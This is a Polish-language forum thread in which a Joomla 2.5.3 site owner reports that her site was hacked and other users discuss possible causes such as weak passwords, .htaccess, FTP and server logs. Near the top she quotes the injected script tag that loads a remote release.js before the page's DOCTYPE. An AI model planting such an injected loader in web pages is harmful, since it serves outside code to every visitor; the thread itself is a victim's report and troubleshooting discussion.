Złośliwy kod Joomla 2.5.3 -Atak na Joomla!

[bosopopiasq]

Dziś ledwo ledwo weszłam na stroną,nie wiedziałam co sie stało,muliło,kręciło zauważyłam że następuje ciągłe dziwne łączenie ze stroną organicfoodmarekts,myślałam ze to coś z reklamami,ale nie mam takich więc
zajrzałam w żródło strony a tam "Szok"

Kod:

<script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js">
</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" dir="ltr" > <head>   <meta http-equiv="content-type" content="text/html; charset=utf-8" />

Oczywiście zaraz wysłałam nowka pliki Joomla i problem znikł
Także "Nasza Joomla 2.5.3 "Jest podatna na ataki

[nikszal]

Przejrzyj logi serwera i sprawdź przez co weszli. To jest ważna informacja dla wszystkich.

[bosopopiasq]

Wiem i napisałam do Administratora hostingu-Dam znać!

---------- Post dodany o 08:25 ---------- Poprzedni post był o 08:15 ----------

Dodam,że trzeba nadpisać wszystkie pliki włącznie z modułami,komponentami jak fora,księgi itp,pluginami
Jesli ma sie sporo doinstalowanych dodatków to..też są zarażone!

[nikszal]

Może zainstalowałaś coś pochodzącego z szemranego źródła, albo wersję w fazie rozwoju (alfa, beta...)?

[bosopopiasq]

nie mam zadnych komponentów,modułow,pluginów, tylko wczoraj doinstalowałam najnowsze forum Kunena
Moja Joomla to
Joomla czyściutka i forum Kunena
Wszystko było zarażone,nawet wejście do adresstrony/administrator

---------- Post dodany o 08:39 ---------- Poprzedni post był o 08:38 ----------

domyśliłam sie co trzeba zaktualizować po tym jak i kunena została zarażona

[PeFik]

1) a login i hasło jaki miałaś, niech zgadnę "admin" / admin1 / kotek ?
2) czy ustawiłaś .hhtaceesa (czyli przemianowałaś z z .txt) to bardzo ważne!! bo tam są reguły bezpieczeństwa !!

Kurcze jak widzisz ... nawet najlepsze drzwi można otworzyć, takie życie.

[bosopopiasq]

hasło jest kilkunasto cyfrowe i zawiera litery w tym duże i małe
do serwera jest inne
poczta inne
Obecnie zmienione wszystkie(hasła zmieniam zawsze co jakiś czas-taki mam nawyk od lat)
To ze jestem baba nie znaczy ze używam hasła beybe a loginu love
.htaccess- kolego jest przemianowany,skonfigurowany.
Joomla używam od kilkuuuuu lat,zaczynałam od Mamboo

[palyga007]

Czy coś jest podatne na ataki czy nie będzie można dopiero stwierdzić, po odkryciu skąd przyszedł atak. Równie dobrze infekcja mogła pochodzić z Twojego komputera i zostać przeniesiona poprzez FTP.

[bosopopiasq]

Czy coś jest podatne na ataki czy nie będzie można dopiero stwierdzić, po odkryciu skąd przyszedł atak. Równie dobrze infekcja mogła pochodzić z Twojego komputera i zostać przeniesiona poprzez FTP.

Nie mogła,bo nic nie wysylałam na serwer przez ostatni tydzień,ściągłam jedynie forum kunena,ale pliki są skanowane przy pobieraniu to raz,zanim wypakuje to robie to również.Zauważyłam w sieci po wpisaniu tego kodu tzn adresu tej strony,ze jest kilka stron o podobnym zarażaniu.
Czekam na info od admina hostingu,odpisał owszem,ale zebym pozmieniała hasło hm..czyżby hosting joi.pl był ...podatny?

---------- Post dodany o 13:00 ---------- Poprzedni post był o 12:58 ----------

Jakie miałeś ID Administratora?

miałaś..jestem miałaś
jest okay było zmienione po instalacji XXXL czasu temu

[ramiro]

Jakie miałeś ID Administratora?